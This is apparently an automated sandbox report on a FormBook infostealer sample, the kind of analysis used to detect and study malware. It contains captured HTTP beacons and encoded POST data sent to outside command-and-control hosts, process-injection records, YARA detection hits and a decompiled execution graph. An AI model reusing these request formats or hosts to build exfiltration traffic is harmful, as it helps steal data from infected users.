                                                                      Nov 6, 2024 05:24:43.859493017 CET1236INData Raw: 57 34 f7 a1 0b 06 61 68 68 db b1 aa ad 33 45 d7 32 9e 5a 6f 62 e2 53 8c da 31 de 98 d5 38 f7 e3 49 b2 e9 20 cc 7d 08 c3 52 fb 29 1d 08 67 37 2f 35 82 a5 1a f1 47 b6 fd 11 40 b3 5e a1 6d dd 5f 47 cf c2 48 3b c7 34 28 67 34 9b 0d 4f fe e9 d8 a3 49
                                                                      Data Ascii: W4ahh3E2ZobS18I }R)g7/5G@^m_GH;4(g4OIlUS`$WWglY@(NWuQ&TnJ@- Yva]jQXju2HHadpLEGf*n@\lnJL7+,)N|s"LF)iJS@


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      44192.168.2.650031162.241.85.94804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:45.507786989 CET489OUTGET /m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7XHlSefPEEQngnWsZ2+57h2QZ8Rh1TFPGeT9177P1cahfBJtA0MilqntdvK9z/bAGtCFsek=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.papampalli.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:24:46.294603109 CET504INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 06 Nov 2024 04:24:46 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Location: http://papampalli.shop/m9ej/?08rl=gfUsZufFmKDBP/wr4I3wawh27yThqd6e8DgUc02Caz1AXZo67KCVFRTwEz2BahWw7XHlSefPEEQngnWsZ2+57h2QZ8Rh1TFPGeT9177P1cahfBJtA0MilqntdvK9z/bAGtCFsek=&IrPLc=Knb4R
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      45192.168.2.6500323.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:51.422821045 CET756OUTPOST /84o5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.yourwebbuzz.net
                                                                      Origin: http://www.yourwebbuzz.net
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yourwebbuzz.net/84o5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 49 6a 50 49 43 4d 4a 4f 73 55 6f 4a 43 41 57 69 33 6f 78 4e 58 51 79 4d 6e 35 32 31 43 48 74 64 32 6d 32 43 6c 54 47 4c 35 43 56 4f 5a 68 62 54 34 2f 37 78 37 4b 68 69 4a 65 58 68 45 4a 39 72 41 58 4c 6e 39 2f 4e 64 43 4b 41 53 42 79 66 2f 54 56 63 37 2f 68 46 46 57 41 48 39 44 46 57 6f 2f 6e 4a 4c 33 31 77 78 75 6c 5a 65 46 64 2f 53 2b 4a 52 46 2b 4c 32 2b 6a 51 50 53 33 55 33 77 45 7a 41 62 54 6b 7a 43 34 4d 69 55 2f 51 57 34 65 51 31 2b 49 69 37 73 4e 33 75 2f 77 48 33 56 31 6e 6f 4f 55 52 4e 48 68 53 35 4c 6e 39 7a 46 77 6f 4c 2b 45 73 38 31 55 32 4f 61 79 56 76 63 70 45 47 5a 5a 31 55 39 74 36 71 71
                                                                      Data Ascii: 08rl=IjPICMJOsUoJCAWi3oxNXQyMn521CHtd2m2ClTGL5CVOZhbT4/7x7KhiJeXhEJ9rAXLn9/NdCKASByf/TVc7/hFFWAH9DFWo/nJL31wxulZeFd/S+JRF+L2+jQPS3U3wEzAbTkzC4MiU/QW4eQ1+Ii7sN3u/wH3V1noOURNHhS5Ln9zFwoL+Es81U2OayVvcpEGZZ1U9t6qq


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      46192.168.2.6500333.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:53.967302084 CET780OUTPOST /84o5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.yourwebbuzz.net
                                                                      Origin: http://www.yourwebbuzz.net
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yourwebbuzz.net/84o5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 49 6a 50 49 43 4d 4a 4f 73 55 6f 4a 44 67 6d 69 77 4c 70 4e 47 67 79 4c 36 4a 32 31 4d 6e 74 52 32 6d 36 43 6c 57 6a 4d 34 77 78 4f 5a 41 72 54 71 75 37 78 31 71 68 69 42 2b 57 6c 4c 70 38 70 41 58 58 76 39 37 46 64 43 4b 55 53 42 33 6a 2f 51 6b 63 6b 2f 78 46 39 65 67 48 6a 4d 6c 57 6f 2f 6e 4a 4c 33 31 6b 58 75 6b 78 65 45 74 76 53 2f 6f 52 47 77 72 32 39 6b 51 50 53 7a 55 33 30 45 7a 41 35 54 6d 4c 6f 34 4a 75 55 2f 56 53 34 65 42 31 39 43 69 37 51 4a 33 75 67 30 43 4b 47 39 6b 31 6b 61 6a 68 46 32 53 64 77 72 72 75 66 73 62 4c 64 57 38 63 33 55 30 57 6f 79 31 76 32 72 45 2b 5a 4c 69 59 61 69 4f 50 4a 46 4c 37 4b 78 50 56 55 77 4c 31 4c 37 38 4d 6e 4e 6f 64 4f 45 41 3d 3d
                                                                      Data Ascii: 08rl=IjPICMJOsUoJDgmiwLpNGgyL6J21MntR2m6ClWjM4wxOZArTqu7x1qhiB+WlLp8pAXXv97FdCKUSB3j/Qkck/xF9egHjMlWo/nJL31kXukxeEtvS/oRGwr29kQPSzU30EzA5TmLo4JuU/VS4eB19Ci7QJ3ug0CKG9k1kajhF2SdwrrufsbLdW8c3U0Woy1v2rE+ZLiYaiOPJFL7KxPVUwL1L78MnNodOEA==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      47192.168.2.6500343.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:56.513017893 CET1793OUTPOST /84o5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.yourwebbuzz.net
                                                                      Origin: http://www.yourwebbuzz.net
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yourwebbuzz.net/84o5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 49 6a 50 49 43 4d 4a 4f 73 55 6f 4a 44 67 6d 69 77 4c 70 4e 47 67 79 4c 36 4a 32 31 4d 6e 74 52 32 6d 36 43 6c 57 6a 4d 34 77 35 4f 5a 57 2f 54 34 64 54 78 30 71 68 69 4c 65 57 6d 4c 70 38 6f 41 58 66 72 39 37 42 4e 43 49 73 53 42 53 76 2f 56 57 30 6b 71 42 46 39 53 41 48 69 44 46 58 71 2f 6e 59 4d 33 31 30 58 75 6b 78 65 45 72 72 53 32 5a 52 47 79 72 32 2b 6a 51 50 65 33 55 33 51 45 7a 59 44 54 6d 50 53 35 39 53 55 2f 31 69 34 66 7a 74 39 4f 69 37 6f 4f 33 76 31 30 43 50 65 39 6b 70 2f 61 6d 30 67 32 52 42 77 6f 4c 6a 75 78 6f 47 47 43 4e 6b 78 4c 58 79 50 2f 31 7a 69 68 48 57 50 4c 54 70 74 71 76 4c 4b 63 37 6e 75 2f 2b 41 51 32 4a 4e 41 30 4a 46 72 42 38 78 43 62 69 56 46 6f 71 78 68 71 66 68 47 72 38 77 45 4d 4a 4e 31 30 41 4f 35 78 53 64 39 55 49 76 46 54 77 37 4d 35 2f 63 4e 62 62 4d 38 4a 57 62 4a 76 70 54 54 78 51 4c 47 62 49 39 6c 6a 41 78 46 50 66 49 79 77 57 4e 36 31 67 38 4f 6c 75 58 72 45 55 4f 66 4b 69 61 6b 4e 4f 49 58 59 64 5a 2f 56 4b 36 30 75 47 30 2f 57 6b 55 46 43 [TRUNCATED]
                                                                      Data Ascii: 08rl=IjPICMJOsUoJDgmiwLpNGgyL6J21MntR2m6ClWjM4w5OZW/T4dTx0qhiLeWmLp8oAXfr97BNCIsSBSv/VW0kqBF9SAHiDFXq/nYM310XukxeErrS2ZRGyr2+jQPe3U3QEzYDTmPS59SU/1i4fzt9Oi7oO3v10CPe9kp/am0g2RBwoLjuxoGGCNkxLXyP/1zihHWPLTptqvLKc7nu/+AQ2JNA0JFrB8xCbiVFoqxhqfhGr8wEMJN10AO5xSd9UIvFTw7M5/cNbbM8JWbJvpTTxQLGbI9ljAxFPfIywWN61g8OluXrEUOfKiakNOIXYdZ/VK60uG0/WkUFCMDClBUR002munuLBNt6WEEoj/vhP4C324Vd1pcgW347h43rHTuLsBLlNBIMuWR2b4Pis6U4eVLyRT41qEIoyMWhvOOTKrIz8M3sFthaC5gY+ZcsHDPPDbyWzT5ii+B3NMnByZ+XKC+MuX3WL29kmxM9wMDzHlc2OgdG/jdrw0DWmYh0hNyBVFiN0xdIPtjqC2VrHxdyXvgVWBOpceYvTNYdpQKtsvvKMOVYGVL1B2eJBw1tivI1N35FbUR864QGru2/xOZnJ5qzjj9nZ7yycJh+kwRoPBovGrC6ULZmo4kvnvY3y1hqAWLc3JEchtXNf3zAWf2i7jRFekMbTQBZ6F8NeAsx2tXfTCgFmO1cK4B+noVpYoPIIvbqDiNbiJtwg7vmGBM4TuKO63Sj3NQe/R225PzpGaGze3vE9+CX1GVMFXA3p1KH6bChTdj/f2kUCEmPf/0/EC5E341FEm6JPwmqjLnTSSGgkx4gqB2xBTsyhkef2tkhdeRuqIVUEeGChNjf9jiDd1s8cvi1dritjoegnPWSzIjkAB16pSwG03Q3tUO5RIKd+UPgr4MRHZbb64eHAwdQC6yrH6/54rVALPx+ldCBDrddiCN5NNLpbJ4XzCGlhDxpY3GrBBij94n4zOIh5KZI/gtdaBuH+ykxCAzQA0n0dYO1hbD [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      48192.168.2.6500353.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:24:59.085975885 CET489OUTGET /84o5/?08rl=FhnoB6sXlwwUJ2S0xbdNJQGNi52zNHIg2XWwnAKV1i9NMjPku/WS5PsHH4WgPI0VJn/Y1dNZFJ1NDQC+U2kAsgQSVBacTkqlvkMhlEkshTZpF7vS/ppR4Ym+5wvF5WrQLwolbC4=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.yourwebbuzz.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:24:59.706042051 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:24:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 38 72 6c 3d 46 68 6e 6f 42 36 73 58 6c 77 77 55 4a 32 53 30 78 62 64 4e 4a 51 47 4e 69 35 32 7a 4e 48 49 67 32 58 57 77 6e 41 4b 56 31 69 39 4e 4d 6a 50 6b 75 2f 57 53 35 50 73 48 48 34 57 67 50 49 30 56 4a 6e 2f 59 31 64 4e 5a 46 4a 31 4e 44 51 43 2b 55 32 6b 41 73 67 51 53 56 42 61 63 54 6b 71 6c 76 6b 4d 68 6c 45 6b 73 68 54 5a 70 46 37 76 53 2f 70 70 52 34 59 6d 2b 35 77 76 46 35 57 72 51 4c 77 6f 6c 62 43 34 3d 26 49 72 50 4c 63 3d 4b 6e 62 34 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?08rl=FhnoB6sXlwwUJ2S0xbdNJQGNi52zNHIg2XWwnAKV1i9NMjPku/WS5PsHH4WgPI0VJn/Y1dNZFJ1NDQC+U2kAsgQSVBacTkqlvkMhlEkshTZpF7vS/ppR4Ym+5wvF5WrQLwolbC4=&IrPLc=Knb4R"}</script></head></html>


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:23:20:55
                                                                      Start date:05/11/2024
                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'362'837 bytes
                                                                      MD5 hash:0F2EA753C03B03EAC2E1C52EF6FCE533
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:23:20:56
                                                                      Start date:05/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"
                                                                      Imagebase:0xd80000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2513521514.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:23:21:27
                                                                      Start date:05/11/2024
                                                                      Path:C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe"
                                                                      Imagebase:0xeb0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:23:21:29
                                                                      Start date:05/11/2024
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\control.exe"
                                                                      Imagebase:0xe70000
                                                                      File size:149'504 bytes
                                                                      MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4579324178.0000000000B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4582371287.0000000003230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:23:21:41
                                                                      Start date:05/11/2024
                                                                      Path:C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe"
                                                                      Imagebase:0xeb0000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:23:21:53
                                                                      Start date:05/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff728280000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.4%
                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                        Signature Coverage:9.6%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:41
                                                                        execution_graph 86127 4010e0 86130 401100 86127->86130 86129 4010f8 86131 401113 86130->86131 86133 401184 86131->86133 86134 40114c 86131->86134 86141 401120 86131->86141 86161 401182 86131->86161 86132 40112c DefWindowProcW 86132->86129 86168 401250 86133->86168 86136 401151 86134->86136 86137 40119d 86134->86137 86139 401219 86136->86139 86140 40115d 86136->86140 86138 42afb4 86137->86138 86143 4011a3 86137->86143 86184 40f190 10 API calls 86138->86184 86139->86141 86146 401225 86139->86146 86144 401163 86140->86144 86145 42b01d 86140->86145 86141->86132 86189 401000 Shell_NotifyIconW __cftof2_l 86141->86189 86143->86141 86150 4011b6 KillTimer 86143->86150 86151 4011db SetTimer RegisterWindowMessageW 86143->86151 86152 42afe9 86144->86152 86153 40116c 86144->86153 86145->86132 86188 4370f4 52 API calls 86145->86188 86191 468b0e 74 API calls __cftof2_l 86146->86191 86148 401193 86148->86129 86149 42b04f 86190 40e0c0 74 API calls __cftof2_l 86149->86190 86183 401000 Shell_NotifyIconW __cftof2_l 86150->86183 86151->86148 86158 401204 CreatePopupMenu 86151->86158 86186 40f190 10 API calls 86152->86186 86153->86141 86160 401174 86153->86160 86158->86129 86185 45fd57 65 API calls __cftof2_l 86160->86185 86161->86132 86162 42afe4 86162->86148 86163 42b00e 86187 401a50 336 API calls 86163->86187 86164 4011c9 PostQuitMessage 86164->86129 86167 42afdc 86167->86132 86167->86162 86169 401262 __cftof2_l 86168->86169 86170 4012e8 86168->86170 86192 401b80 86169->86192 86170->86148 86172 40128c 86173 4012d1 KillTimer SetTimer 86172->86173 86174 4012bb 86172->86174 86175 4272ec 86172->86175 86173->86170 86176 4012c5 86174->86176 86177 42733f 86174->86177 86178 4272f4 Shell_NotifyIconW 86175->86178 86179 42731a Shell_NotifyIconW 86175->86179 86176->86173 86180 427393 Shell_NotifyIconW 86176->86180 86181 427348 Shell_NotifyIconW 86177->86181 86182 42736e Shell_NotifyIconW 86177->86182 86178->86173 86179->86173 86180->86173 86181->86173 86182->86173 86183->86164 86184->86148 86185->86167 86186->86163 86187->86161 86188->86161 86189->86149 86190->86161 86191->86162 86193 401b9c 86192->86193 86213 401c7e 86192->86213 86214 4013c0 52 API calls 86193->86214 86195 401bac 86196 42722b LoadStringW 86195->86196 86197 401bb9 86195->86197 86199 427246 86196->86199 86215 402160 86197->86215 86229 40e0a0 86199->86229 86200 401bcd 86202 427258 86200->86202 86203 401bda 86200->86203 86233 40d200 52 API calls 2 library calls 86202->86233 86203->86199 86204 401be4 86203->86204 86228 40d200 52 API calls 2 library calls 86204->86228 86207 427267 86208 42727b 86207->86208 86209 401bf3 _wcscpy __cftof2_l _wcsncpy 86207->86209 86234 40d200 52 API calls 2 library calls 86208->86234 86212 401c62 Shell_NotifyIconW 86209->86212 86211 427289 86212->86213 86213->86172 86214->86195 86216 426daa 86215->86216 86217 40216b _wcslen 86215->86217 86248 40c600 86216->86248 86220 402180 86217->86220 86221 40219e 86217->86221 86219 426db5 86219->86200 86235 403bd0 52 API calls ctype 86220->86235 86236 4013a0 52 API calls 86221->86236 86224 4021a5 86226 426db7 86224->86226 86237 4115d7 86224->86237 86225 402187 _memmove 86225->86200 86228->86209 86230 40e0b2 86229->86230 86231 40e0a8 86229->86231 86230->86209 86284 403c30 52 API calls _memmove 86231->86284 86233->86207 86234->86211 86235->86225 86236->86224 86239 4115e1 _malloc 86237->86239 86240 4115fb 86239->86240 86241 4115fd std::exception::exception 86239->86241 86253 4135bb 86239->86253 86240->86225 86246 41163b 86241->86246 86267 41130a 51 API calls __cinit 86241->86267 86243 411645 86269 418105 RaiseException 86243->86269 86268 4180af 46 API calls std::exception::operator= 86246->86268 86247 411656 86249 40c619 86248->86249 86250 40c60a 86248->86250 86249->86219 86250->86249 86276 4026f0 86250->86276 86252 426d7a _memmove 86252->86219 86254 413638 _malloc 86253->86254 86256 4135c9 _malloc 86253->86256 86275 417f77 46 API calls __getptd_noexit 86254->86275 86255 4135d4 86255->86256 86270 418901 46 API calls __NMSG_WRITE 86255->86270 86271 418752 46 API calls 7 library calls 86255->86271 86272 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86255->86272 86256->86255 86259 4135f7 RtlAllocateHeap 86256->86259 86262 413624 86256->86262 86265 413622 86256->86265 86259->86256 86260 413630 86259->86260 86260->86239 86273 417f77 46 API calls __getptd_noexit 86262->86273 86274 417f77 46 API calls __getptd_noexit 86265->86274 86267->86246 86268->86243 86269->86247 86270->86255 86271->86255 86273->86265 86274->86260 86275->86260 86277 426873 86276->86277 86278 4026ff 86276->86278 86283 4013a0 52 API calls 86277->86283 86278->86252 86280 42687b 86281 4115d7 52 API calls 86280->86281 86282 42689e _memmove 86281->86282 86282->86252 86283->86280 86284->86230 86285 40bd20 86288 428194 86285->86288 86289 40bd2d 86285->86289 86286 40bd43 86287 4281bc 86307 45e987 86 API calls ctype 86287->86307 86288->86286 86288->86287 86291 4281b2 86288->86291 86295 40bd37 86289->86295 86308 4531b1 85 API calls 5 library calls 86289->86308 86306 40b510 VariantClear 86291->86306 86297 40bd50 86295->86297 86296 4281ba 86298 426cf1 86297->86298 86299 40bd63 86297->86299 86318 44cde9 52 API calls _memmove 86298->86318 86309 40bd80 86299->86309 86302 40bd73 86302->86286 86303 426cfc 86304 40e0a0 52 API calls 86303->86304 86305 426d02 86304->86305 86306->86296 86307->86289 86308->86295 86310 40bd8e 86309->86310 86317 40bdb7 _memmove 86309->86317 86311 40bded 86310->86311 86312 40bdad 86310->86312 86310->86317 86313 4115d7 52 API calls 86311->86313 86319 402f00 86312->86319 86315 40bdf6 86313->86315 86316 4115d7 52 API calls 86315->86316 86315->86317 86316->86317 86317->86302 86318->86303 86320 402f10 86319->86320 86321 402f0c 86319->86321 86322 4115d7 52 API calls 86320->86322 86323 4268c3 86320->86323 86321->86317 86324 402f51 ctype _memmove 86322->86324 86324->86317 86325 425ba2 86330 40e360 86325->86330 86327 425bb4 86346 41130a 51 API calls __cinit 86327->86346 86329 425bbe 86331 4115d7 52 API calls 86330->86331 86332 40e3ec GetModuleFileNameW 86331->86332 86347 413a0e 86332->86347 86334 40e421 _wcsncat 86350 413a9e 86334->86350 86337 4115d7 52 API calls 86338 40e45e _wcscpy 86337->86338 86353 40bc70 86338->86353 86342 40e4a9 86342->86327 86343 401c90 52 API calls 86345 40e4a1 _wcscat _wcslen _wcsncpy 86343->86345 86344 4115d7 52 API calls 86344->86345 86345->86342 86345->86343 86345->86344 86346->86329 86372 413801 86347->86372 86402 419efd 86350->86402 86354 4115d7 52 API calls 86353->86354 86355 40bc98 86354->86355 86356 4115d7 52 API calls 86355->86356 86357 40bca6 86356->86357 86358 40e4c0 86357->86358 86414 403350 86358->86414 86360 40e4cb RegOpenKeyExW 86361 427190 RegQueryValueExW 86360->86361 86362 40e4eb 86360->86362 86363 4271b0 86361->86363 86364 42721a RegCloseKey 86361->86364 86362->86345 86365 4115d7 52 API calls 86363->86365 86364->86345 86366 4271cb 86365->86366 86421 43652f 52 API calls 86366->86421 86368 4271d8 RegQueryValueExW 86369 42720e 86368->86369 86370 4271f7 86368->86370 86369->86364 86371 402160 52 API calls 86370->86371 86371->86369 86373 41389e 86372->86373 86380 41381a 86372->86380 86374 4139e8 86373->86374 86375 413a00 86373->86375 86399 417f77 46 API calls __getptd_noexit 86374->86399 86401 417f77 46 API calls __getptd_noexit 86375->86401 86378 4139ed 86400 417f25 10 API calls __cftof2_l 86378->86400 86380->86373 86385 41388a 86380->86385 86394 419e30 46 API calls __cftof2_l 86380->86394 86382 41396c 86382->86373 86383 413967 86382->86383 86386 41397a 86382->86386 86383->86334 86384 413929 86384->86373 86387 413945 86384->86387 86396 419e30 46 API calls __cftof2_l 86384->86396 86385->86373 86393 413909 86385->86393 86395 419e30 46 API calls __cftof2_l 86385->86395 86398 419e30 46 API calls __cftof2_l 86386->86398 86387->86373 86387->86383 86389 41395b 86387->86389 86397 419e30 46 API calls __cftof2_l 86389->86397 86393->86382 86393->86384 86394->86385 86395->86393 86396->86387 86397->86383 86398->86383 86399->86378 86400->86383 86401->86383 86403 419f13 86402->86403 86404 419f0e 86402->86404 86411 417f77 46 API calls __getptd_noexit 86403->86411 86404->86403 86408 419f2b 86404->86408 86406 419f18 86412 417f25 10 API calls __cftof2_l 86406->86412 86409 40e454 86408->86409 86413 417f77 46 API calls __getptd_noexit 86408->86413 86409->86337 86411->86406 86412->86409 86413->86406 86415 403367 86414->86415 86416 403358 86414->86416 86417 4115d7 52 API calls 86415->86417 86416->86360 86418 403370 86417->86418 86419 4115d7 52 API calls 86418->86419 86420 40339e 86419->86420 86420->86360 86421->86368 86422 3d990f8 